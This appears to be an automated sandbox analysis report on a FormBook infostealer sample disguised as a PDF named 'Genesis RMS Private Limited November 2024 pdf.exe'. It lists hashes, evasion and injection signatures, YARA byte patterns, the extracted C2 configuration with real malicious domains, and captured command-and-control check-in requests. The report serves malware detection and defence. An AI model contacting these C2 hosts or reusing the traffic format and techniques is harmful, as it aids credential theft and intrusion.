Windows Analysis Report
Genesis RMS Private Limited November 2024 pdf.exe

Overview

General Information

Sample name: Genesis RMS Private Limited November 2024 pdf.exe
Analysis ID: 1562986
MD5: a03815195e40a8caf9e0da80eccb9240
SHA1: f770dbb9f49ad2f03955a2c5a8c70373652d2ba9
SHA256: 1477618f7a47c1e6cef99ff4626f541de642a01ec9219290d3a92546abc21c9e
Tags: exe, user-lowmal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Rundll32 Execution Without CommandLine Parameters
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Genesis RMS Private Limited November 2024 pdf.exe (PID: 7684 cmdline: "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe" MD5: A03815195E40A8CAF9E0DA80ECCB9240)
    • svchost.exe (PID: 7700 cmdline: "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • rundll32.exe (PID: 7800 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
          • cmd.exe (PID: 7832 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.9-club.store/ma28/"], "decoy": ["orth.monster", "5970.pizza", "oinayangi.net", "usiness-funding-48965.bond", "uttere.buzz", "raumainformed.xyz", "amewith.today", "hetangosalon.net", "irewoodprice168.shop", "commerce-96305.bond", "3107.loan", "uohan.tech", "agakaw.website", "fricaduka.store", "ecga.info", "arehouse-inventory-27582.bond", "itchen-design-87997.bond", "eishahousesteaksushi.shop", "liopew.xyz", "4769.pizza", "111337tz1.shop", "6bwp.info", "edlinecolorado.net", "trewzxvbnm.online", "hemebox.info", "ajinismusdoktorankara.online", "iralcity.store", "aitbus.net", "w05.lat", "ruck-driver-jobs-16575.bond", "nline-advertising-48679.bond", "ryptocurrency-22237.bond", "epression-test-52238.bond", "otellatour.online", "leaningsuppliesorganizer.shop", "ardinenchante.online", "larheit.xyz", "elmondo.xyz", "xj121529q.vip", "nfluencer-marketing-83144.bond", "olconsulting.xyz", "nah.lat", "etking.photos", "dadlkj.online", "indows-66239.bond", "loverhoodie.shop", "rkaos.xyz", "afikotakediri.store", "iaokoa.net", "aahoma-alex1.rest", "revenzionefiscale.info", "itchen-design-56744.bond", "ueijodeminasoriginal.shop", "reast-cancer-symtoms-loft.world", "iddyspiderish.life", "execution.pro", "vjoami3.xyz", "4fe5i.xyz", "om-exchange-nft55729.sbs", "hgevb.info", "isc8ito.xyz", "ursuitbegins.forum", "louddistribution.net", "odgerlazerhats.net"]}
Source | Rule | Description | Author | Strings
Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x18809:$sqlite3step: 68 34 1C 7B E1
  • 0x1891c:$sqlite3step: 68 34 1C 7B E1
  • 0x18838:$sqlite3text: 68 38 2A 90 C5
  • 0x1895d:$sqlite3text: 68 38 2A 90 C5
  • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
(34 further memory-dump entries omitted)

Source | Rule | Description | Author | Strings
Source: 1.2.svchost.exe.400000.0.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 1.2.svchost.exe.400000.0.unpack | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 1.2.svchost.exe.400000.0.unpack | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
Source: 1.2.svchost.exe.400000.0.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 1.2.svchost.exe.400000.0.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x17a09:$sqlite3step: 68 34 1C 7B E1
  • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
  • 0x17a38:$sqlite3text: 68 38 2A 90 C5
  • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
  • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
(15 further unpacked-PE entries omitted)

          System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\SysWOW64\rundll32.exe", CommandLine: "C:\Windows\SysWOW64\rundll32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ProcessId: 7800, ProcessName: rundll32.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe", CommandLine: "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe", CommandLine|base64offset|contains: D, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe", ParentImage: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe, ParentProcessId: 7684, ParentProcessName: Genesis RMS Private Limited November 2024 pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe", ProcessId: 7700, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe", CommandLine: "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe", CommandLine|base64offset|contains: D, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe", ParentImage: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe, ParentProcessId: 7684, ParentProcessName: Genesis RMS Private Limited November 2024 pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe", ProcessId: 7700, ProcessName: svchost.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-26T11:17:18.647765+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49909 | 156.67.73.254 | 80 | TCP


          AV Detection

Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.9-club.store/ma28/"], "decoy": ["orth.monster", "5970.pizza", "oinayangi.net", "usiness-funding-48965.bond", "uttere.buzz", "raumainformed.xyz", "amewith.today", "hetangosalon.net", "irewoodprice168.shop", "commerce-96305.bond", "3107.loan", "uohan.tech", "agakaw.website", "fricaduka.store", "ecga.info", "arehouse-inventory-27582.bond", "itchen-design-87997.bond", "eishahousesteaksushi.shop", "liopew.xyz", "4769.pizza", "111337tz1.shop", "6bwp.info", "edlinecolorado.net", "trewzxvbnm.online", "hemebox.info", "ajinismusdoktorankara.online", "iralcity.store", "aitbus.net", "w05.lat", "ruck-driver-jobs-16575.bond", "nline-advertising-48679.bond", "ryptocurrency-22237.bond", "epression-test-52238.bond", "otellatour.online", "leaningsuppliesorganizer.shop", "ardinenchante.online", "larheit.xyz", "elmondo.xyz", "xj121529q.vip", "nfluencer-marketing-83144.bond", "olconsulting.xyz", "nah.lat", "etking.photos", "dadlkj.online", "indows-66239.bond", "loverhoodie.shop", "rkaos.xyz", "afikotakediri.store", "iaokoa.net", "aahoma-alex1.rest", "revenzionefiscale.info", "itchen-design-56744.bond", "ueijodeminasoriginal.shop", "reast-cancer-symtoms-loft.world", "iddyspiderish.life", "execution.pro", "vjoami3.xyz", "4fe5i.xyz", "om-exchange-nft55729.sbs", "hgevb.info", "isc8ito.xyz", "ursuitbegins.forum", "louddistribution.net", "odgerlazerhats.net"]}
Source: Genesis RMS Private Limited November 2024 pdf.exe | ReversingLabs: Detection: 26%
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Genesis RMS Private Limited November 2024 pdf.exe | Joe Sandbox ML: detected
Source: Genesis RMS Private Limited November 2024 pdf.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: wntdll.pdbUGP source: Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000003.1669851309.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000003.1670101325.0000000004210000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1734632822.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1672216614.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1673809619.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1734632822.000000000349E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1739113966.0000000004B95000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1734729766.00000000049E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130005798.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130005798.0000000004EDE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000003.1669851309.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000003.1670101325.0000000004210000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1734632822.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1672216614.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1673809619.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1734632822.000000000349E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000003.00000003.1739113966.0000000004B95000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1734729766.00000000049E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130005798.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130005798.0000000004EDE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: svchost.exe, 00000001.00000003.1733882556.0000000002C3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1733820601.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1734555328.0000000002FE0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4129174165.0000000000C20000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: svchost.exe, 00000001.00000003.1733882556.0000000002C3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1733820601.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1734555328.0000000002FE0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000002.4129174165.0000000000C20000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000002.00000002.4141763780.00000000110CF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130564299.000000000528F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000002.4129438375.0000000003142000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000002.00000002.4141763780.00000000110CF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130564299.000000000528F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000002.4129438375.0000000003142000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007B4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_007B4696
Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007BC93C FindFirstFileW,FindClose,0_2_007BC93C
Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_007BC9C7
Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007BF200
Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007BF35D
Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007BF65E
Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007B3A2B
Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007B3D4E
Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007BBF27
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then pop edi | 1_2_0040E3B6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then pop edi | 1_2_00417D7B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4x nop then pop edi | 3_2_02C4E3B6
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4x nop then pop edi | 3_2_02C57D7B

          Networking

Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49909 -> 156.67.73.254:80
Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49909 -> 156.67.73.254:80
Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49909 -> 156.67.73.254:80
Source: Malware configuration extractor | URLs: www.9-club.store/ma28/
Source: DNS query: www.vjoami3.xyz
Source: DNS query: www.olconsulting.xyz
Source: unknown | DNS traffic detected: query: www.ryptocurrency-22237.bond reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.olconsulting.xyz reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.fricaduka.store reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.iaokoa.net reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.odgerlazerhats.net reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.iddyspiderish.life reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.itchen-design-87997.bond reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.vjoami3.xyz reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.hetangosalon.net reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.iralcity.store reply code: Name error (3)
Source: global traffic | HTTP traffic detected: GET /ma28/?ghl=g3TxkNl+yn5Twcj+LCxINTWO7KBD43aaoKhKXIKU+srW3oC+3I0AD9gGWk+MTAYfd+/z&DvcT5=gd64Xt4xCL HTTP/1.1 | Host: www.loverhoodie.shop | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | ASN Name: TESONETLT TESONETLT
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 identical events)
Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007C25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_007C25E2
Source: global traffic | HTTP traffic detected: GET /ma28/?ghl=g3TxkNl+yn5Twcj+LCxINTWO7KBD43aaoKhKXIKU+srW3oC+3I0AD9gGWk+MTAYfd+/z&DvcT5=gd64Xt4xCL HTTP/1.1 | Host: www.loverhoodie.shop | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | DNS traffic detected: DNS query: www.iddyspiderish.life
Source: global traffic | DNS traffic detected: DNS query: www.fricaduka.store
Source: global traffic | DNS traffic detected: DNS query: www.iralcity.store
Source: global traffic | DNS traffic detected: DNS query: www.itchen-design-87997.bond
Source: global traffic | DNS traffic detected: DNS query: www.hetangosalon.net
Source: global traffic | DNS traffic detected: DNS query: www.loverhoodie.shop
Source: global traffic | DNS traffic detected: DNS query: www.vjoami3.xyz
Source: global traffic | DNS traffic detected: DNS query: www.ryptocurrency-22237.bond
Source: global traffic | DNS traffic detected: DNS query: www.iaokoa.net
Source: global traffic | DNS traffic detected: DNS query: www.odgerlazerhats.net
Source: global traffic | DNS traffic detected: DNS query: www.olconsulting.xyz
Source: explorer.exe, 00000002.00000003.3106127802.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691972906.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135356271.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1688723563.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000002.00000003.3106127802.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691972906.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135356271.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1688723563.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000003.3106127802.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691972906.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135356271.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1688723563.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000002.00000003.3106127802.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691972906.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135356271.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1688723563.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.1688723563.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000000.1696576588.000000000CA63000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106099982.000000000CA64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140661866.000000000CA66000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000002.00000000.1696576588.000000000CA63000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106099982.000000000CA64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140661866.000000000CA66000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000002.00000000.1690797571.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4133618844.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1693239826.0000000009B60000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
